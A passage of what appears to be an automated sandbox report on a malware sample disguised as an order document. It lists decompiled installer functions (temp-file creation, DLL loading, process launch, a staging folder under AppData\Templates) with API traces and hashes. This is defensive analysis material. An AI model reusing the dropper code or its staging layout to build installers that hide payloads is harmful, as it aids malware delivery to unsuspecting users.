					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                0x00405c3c
                                                0x00405c42
                                                0x00405c43
                                                0x00405c43
                                                0x00405c48
                                                0x00405c49
                                                0x00405c4c
                                                0x00405c51
                                                0x00405c54
                                                0x00405c5e
                                                0x00405c6b
                                                0x00405c6f
                                                0x00405c77
                                                0x00000000
                                                0x00000000
                                                0x00405c7b
                                                0x00000000
                                                0x00405c7d
                                                0x00405c7d
                                                0x00405c7d
                                                0x00405c80
                                                0x00405c83
                                                0x00405c83
                                                0x00405c86
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405C54
                                                • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040327B,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00405C6F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3083371207
                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                • Instruction ID: 8a35e51ea0d0ee70ea5c20e8edce62ba12a10af59c8f3d63fe044a56b3f339a6
                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                • Instruction Fuzzy Hash: 99F06276600704BFEB008B55DD05E9F77A8EB91750F10403AED00F7140E6B09A548B58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040639C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040639C(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryW( &_v576); // executed
				return _t17;
			}








                                                0x004063b3
                                                0x004063bc
                                                0x004063be
                                                0x004063be
                                                0x004063c2
                                                0x004063d5
                                                0x004063cf
                                                0x004063cf
                                                0x004063cf
                                                0x004063ee
                                                0x004063fe
                                                0x00406405

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
                                                • wsprintfW.USER32 ref: 004063EE
                                                • LoadLibraryW.KERNELBASE(?), ref: 004063FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll
                                                • API String ID: 2200240437-2744773210
                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                • Instruction ID: 2cc1e6addeffa93896351747fd2b076c866e84041b4f9c80d347ce7491f0a061
                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                • Instruction Fuzzy Hash: 6CF0BB70510129D7DB14AB64EE0DD9B366CEB00305F11447BA946F10D1FBBCDA69CBE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E00401E66() {
				void* _t16;
				long _t20;
				void* _t25;
				void* _t32;

				_t29 = E00402BBF(_t25);
				E00405191(0xffffffeb, _t14);
				_t16 = E00405712(_t29); // executed
				 *(_t32 + 8) = _t16;
				if(_t16 == _t25) {
					 *((intOrPtr*)(_t32 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t32 - 0x24)) != _t25) {
						_t20 = WaitForSingleObject(_t16, 0x64);
						while(_t20 == 0x102) {
							E00406444(0xf);
							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
						}
						GetExitCodeProcess( *(_t32 + 8), _t32 - 8);
						if( *((intOrPtr*)(_t32 - 0x28)) < _t25) {
							if( *(_t32 - 8) != _t25) {
								 *((intOrPtr*)(_t32 - 4)) = 1;
							}
						} else {
							E00405F79( *((intOrPtr*)(_t32 - 0x10)),  *(_t32 - 8));
						}
					}
					_push( *(_t32 + 8));
					CloseHandle();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}







                                                0x00401e6c
                                                0x00401e71
                                                0x00401e77
                                                0x00401e7e
                                                0x00401e81
                                                0x0040281e
                                                0x00401e87
                                                0x00401e8a
                                                0x00401e95
                                                0x00401eac
                                                0x00401ea0
                                                0x00401eaa
                                                0x00401eaa
                                                0x00401eb7
                                                0x00401ec0
                                                0x00401ed2
                                                0x00401ed4
                                                0x00401ed4
                                                0x00401ec2
                                                0x00401ec8
                                                0x00401ec8
                                                0x00401ec0
                                                0x00401edb
                                                0x00401ede
                                                0x00401ede
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                  • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                  • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                  • Part of subcall function 00405712: CreateProcessW.KERNELBASE ref: 0040573B
                                                  • Part of subcall function 00405712: CloseHandle.KERNEL32(0040A300), ref: 00405748
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                • GetExitCodeProcess.KERNEL32 ref: 00401EB7
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
                                                • Instruction ID: d208eef208ec2c6f5187e880842865a00525bcfa3f2a05837fac4e2667901554
                                                • Opcode Fuzzy Hash: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
                                                • Instruction Fuzzy Hash: F911C431A00508EBCF20AF91CD859AE7BB2EF40314F24403BF501B61E1C7798A91DB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100028A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(00000000), ref: 10002963
                                                • GetLastError.KERNEL32 ref: 10002A6A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID: @M)w
                                                • API String ID: 1214770103-1211491014
                                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E004015B9(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402BBF(0xfffffff0);
				_t17 = E00405A91(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405A13(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004056DD( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x24)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x24)) == _t28 || E004056FA(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405660( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x28)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                0x004015b9
                                                0x004015c1
                                                0x004015c4
                                                0x004015c9
                                                0x004015cd
                                                0x004015cf
                                                0x004015d7
                                                0x004015d9
                                                0x004015dc
                                                0x004015e2
                                                0x004015fc
                                                0x004015ff
                                                0x004015e4
                                                0x004015e4
                                                0x004015e7
                                                0x00000000
                                                0x004015f2
                                                0x004015f5
                                                0x004015f5
                                                0x004015e7
                                                0x00401606
                                                0x0040160d
                                                0x0040161c
                                                0x0040161c
                                                0x0040160f
                                                0x00401612
                                                0x0040161a
                                                0x00000000
                                                0x00000000
                                                0x0040161a
                                                0x0040160d
                                                0x0040161f
                                                0x00401623
                                                0x00401624
                                                0x004015cf
                                                0x0040162c
                                                0x0040165b
                                                0x004021dc
                                                0x0040162e
                                                0x00401630
                                                0x0040163d
                                                0x00401645
                                                0x0040164d
                                                0x00401653
                                                0x00401653
                                                0x0040164d
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                  • Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,0040A300,00405B05,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                  • Part of subcall function 00405660: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user~1\AppData\Local\Temp\), ref: 004056A3
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,00000000,000000F0), ref: 00401645
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00401638
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
                                                • API String ID: 1892508949-2561518016
                                                • Opcode ID: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
                                                • Instruction ID: 415897e78b6bad03a127c6f6368a694d7e54beaaa1ae65b52f31c6ed2c47f3e3
                                                • Opcode Fuzzy Hash: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
                                                • Instruction Fuzzy Hash: 8C11E631504514ABCF20BFA4CD4099E36B1EF44364B24093BEA05B62F1DA3E4E819F5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405712 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405712(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f48->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f48,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                0x0040571b
                                                0x0040573b
                                                0x00405743
                                                0x00405748
                                                0x00000000
                                                0x0040574e
                                                0x00405752

                                                APIs
                                                • CreateProcessW.KERNELBASE ref: 0040573B
                                                • CloseHandle.KERNEL32(0040A300), ref: 00405748
                                                Strings
                                                • Error launching installer, xrefs: 00405725
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
                                                • Instruction ID: 7a3daaf9c9c1dfce14d3e2680162b4324113c6786a0a66257257a350a584d1d9
                                                • Opcode Fuzzy Hash: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
                                                • Instruction Fuzzy Hash: 67E046F4600209BFEB10AB60ED49F7B7BACEB44204F008420BE50F2190DAB8D8108A78
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E00401FC3(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x7a8af8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402BBF(0xfffffff0);
				 *((intOrPtr*)(_t39 - 8)) = E00402BBF(1);
				if( *((intOrPtr*)(_t39 - 0x1c)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E00406477( *(_t39 + 8),  *((intOrPtr*)(_t39 - 8)));
					if(_t38 == _t32) {
						E00405191(0xfffffff7,  *((intOrPtr*)(_t39 - 8)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x24)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 0xc)), 0x400, _t34, 0x40cdcc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x24)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x20)) == _t32 && E0040381B( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                0x00401fc3
                                                0x00401fc3
                                                0x00401fc8
                                                0x00401fcf
                                                0x0040208e
                                                0x004021dc
                                                0x004021dc
                                                0x00402a4c
                                                0x00402a4f
                                                0x00402a5b
                                                0x00402a5b
                                                0x00401fde
                                                0x00401fe8
                                                0x00401feb
                                                0x00401ffb
                                                0x00401fff
                                                0x00402007
                                                0x0040200a
                                                0x00402087
                                                0x00000000
                                                0x00402087
                                                0x0040200c
                                                0x00402017
                                                0x0040201b
                                                0x0040205b
                                                0x0040201d
                                                0x00402020
                                                0x00402023
                                                0x0040204f
                                                0x00402025
                                                0x00402028
                                                0x00402031
                                                0x00402033
                                                0x00402033
                                                0x00402031
                                                0x00402023
                                                0x00402063
                                                0x0040207c
                                                0x0040207c
                                                0x00000000
                                                0x00402063
                                                0x00401fee
                                                0x00401ff6
                                                0x00401ff9
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                  • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                  • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
